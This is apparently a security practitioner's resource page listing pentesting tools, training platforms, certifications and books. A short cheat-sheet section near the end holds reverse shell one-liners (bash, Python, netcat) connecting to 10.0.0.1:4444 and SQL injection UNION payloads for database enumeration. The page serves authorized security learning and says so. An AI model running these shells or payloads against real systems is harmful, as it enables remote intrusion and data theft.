Tools & Resources
A curated collection of security tools, learning resources, cheat sheets, and references I use regularly in my security work.
ℹ️ Info: This page is continuously updated with new tools and resources. Bookmark it for quick reference!
Essential Security Tools
Reconnaissance & Enumeration
Network Scanning:
- Nmap (opens in a new tab) - Network discovery and security auditing
- Masscan (opens in a new tab) - Fast port scanner
- RustScan (opens in a new tab) - Modern port scanner
Web Reconnaissance:
- Gobuster (opens in a new tab) - Directory/file brute-forcing
- ffuf (opens in a new tab) - Fast web fuzzer
- Amass (opens in a new tab) - Subdomain enumeration
- httpx (opens in a new tab) - HTTP toolkit
DNS & Subdomain Discovery:
- Subfinder (opens in a new tab) - Subdomain discovery
- DNSrecon (opens in a new tab) - DNS enumeration
- MassDNS (opens in a new tab) - High-performance DNS resolver
Exploitation Frameworks
- Metasploit Framework (opens in a new tab) - Penetration testing platform
- Empire (opens in a new tab) - Post-exploitation framework
- Cobalt Strike (opens in a new tab) - Adversary simulation (commercial)
- Sliver (opens in a new tab) - Open-source C2 framework
Web Application Testing
Proxies & Interceptors:
- Burp Suite (opens in a new tab) - Web security testing platform
- OWASP ZAP (opens in a new tab) - Open-source web app scanner
- Caido (opens in a new tab) - Modern web security testing toolkit
Scanners:
- Nuclei (opens in a new tab) - Vulnerability scanner
- sqlmap (opens in a new tab) - Automatic SQL injection tool
- XSStrike (opens in a new tab) - XSS detection suite
- Nikto (opens in a new tab) - Web server scanner
Password & Credential Attacks
- Hashcat (opens in a new tab) - Password recovery tool
- John the Ripper (opens in a new tab) - Password cracker
- Hydra (opens in a new tab) - Network login cracker
- CrackMapExec (opens in a new tab) - Network pentesting tool
- Mimikatz (opens in a new tab) - Windows credential extraction
Reverse Engineering & Binary Analysis
- Ghidra (opens in a new tab) - Software reverse engineering framework
- IDA Pro (opens in a new tab) - Interactive disassembler (commercial)
- radare2 (opens in a new tab) - Reverse engineering framework
- Binary Ninja (opens in a new tab) - Binary analysis platform
- GDB (opens in a new tab) - GNU debugger with pwndbg (opens in a new tab)
Privilege Escalation
Linux:
- LinPEAS (opens in a new tab) - Linux privilege escalation scanner
- LinEnum (opens in a new tab) - Linux enumeration script
- Linux Smart Enumeration (opens in a new tab) - LSE
Windows:
- WinPEAS (opens in a new tab) - Windows privilege escalation scanner
- PowerUp (opens in a new tab) - PowerShell privilege escalation
- Seatbelt (opens in a new tab) - Security-oriented enumeration
Learning Resources
Capture The Flag (CTF) Platforms
- HackTheBox (opens in a new tab) - Penetration testing labs
- TryHackMe (opens in a new tab) - Guided learning paths
- PentesterLab (opens in a new tab) - Hands-on web pentesting
- OverTheWire (opens in a new tab) - Wargames for learning
- picoCTF (opens in a new tab) - Beginner-friendly CTF
- Root Me (opens in a new tab) - Hacking challenges
Certifications
Beginner to Intermediate:
- CompTIA Security+
- CEH (Certified Ethical Hacker)
- eJPT (eLearnSecurity Junior Penetration Tester)
Advanced:
- OSCP (Offensive Security Certified Professional)
- OSWE (Offensive Security Web Expert)
- OSEP (Offensive Security Experienced Penetration Tester)
- OSCE³ (Offensive Security Certified Expert)
Specialized:
- GPEN (GIAC Penetration Tester)
- GXPN (GIAC Exploit Researcher and Advanced Penetration Tester)
- CRTO (Certified Red Team Operator)
Online Courses & Training
- Offensive Security (opens in a new tab) - PWK, OSCP, and more
- TCM Security Academy (opens in a new tab) - Practical pentesting courses
- eLearnSecurity (opens in a new tab) - Hands-on security training
- SANS Institute (opens in a new tab) - Professional security training
- Portswigger Web Security Academy (opens in a new tab) - Free web security training
Books
Penetration Testing:
- "The Hacker Playbook" series by Peter Kim
- "Penetration Testing" by Georgia Weidman
- "The Web Application Hacker's Handbook" by Dafydd Stuttard
Red Teaming:
- "Red Team Development and Operations" by Joe Vest
- "Operator Handbook" by Joshua Picolet
Binary Exploitation:
- "Hacking: The Art of Exploitation" by Jon Erickson
- "Practical Malware Analysis" by Michael Sikorski
- "The Shellcoder's Handbook" by Chris Anley
Blogs & Communities
- PortSwigger Research (opens in a new tab)
- HackerOne Hacktivity (opens in a new tab)
- 0x00sec (opens in a new tab) - Hacker community
- /r/netsec (opens in a new tab) - Network security subreddit
- /r/AskNetsec (opens in a new tab) - Security Q&A
Cheat Sheets & References
Command References
Nmap Commands
# Quick TCP scan
nmap -sC -sV -oA output target
# Full port scan
nmap -p- --min-rate=1000 -oA full-scan target
# UDP scan
nmap -sU --top-ports 20 target
# Aggressive scan
nmap -A -T4 targetReverse Shells
# Bash TCP
bash -i >& /dev/tcp/10.0.0.1/4444 0>&1
# Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
# Netcat
nc -e /bin/sh 10.0.0.1 4444
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4444 >/tmp/fSQL Injection
-- Basic union injection
' UNION SELECT NULL,NULL,NULL--
-- Database enumeration
' UNION SELECT schema_name,NULL FROM information_schema.schemata--
-- Table enumeration
' UNION SELECT table_name,NULL FROM information_schema.tables WHERE table_schema='database'--
-- Column enumeration
' UNION SELECT column_name,NULL FROM information_schema.columns WHERE table_name='users'--Quick References
- GTFOBins (opens in a new tab) - Unix binaries that can be exploited
- LOLBAS (opens in a new tab) - Living Off The Land Binaries (Windows)
- PayloadsAllTheThings (opens in a new tab) - Useful payloads
- HackTricks (opens in a new tab) - Pentesting knowledge base
- Reverse Shell Cheat Sheet (opens in a new tab)
Useful Wordlists
- SecLists (opens in a new tab) - Collection of multiple types of lists
- rockyou.txt (opens in a new tab) - Classic password list
- FuzzDB (opens in a new tab) - Fuzzing database
- Assetnote Wordlists (opens in a new tab) - Curated wordlists
Browser Extensions
- Wappalyzer: Technology profiler
- Cookie-Editor: Cookie manipulation
- FoxyProxy: Proxy switching
- Retire.js: JavaScript library vulnerability scanner
⚠️ Warning: Always ensure you have authorization before using these tools on any target. Unauthorized access is illegal.
Last updated: 2/3/2026
Have a tool or resource to suggest? Open an issue (opens in a new tab)!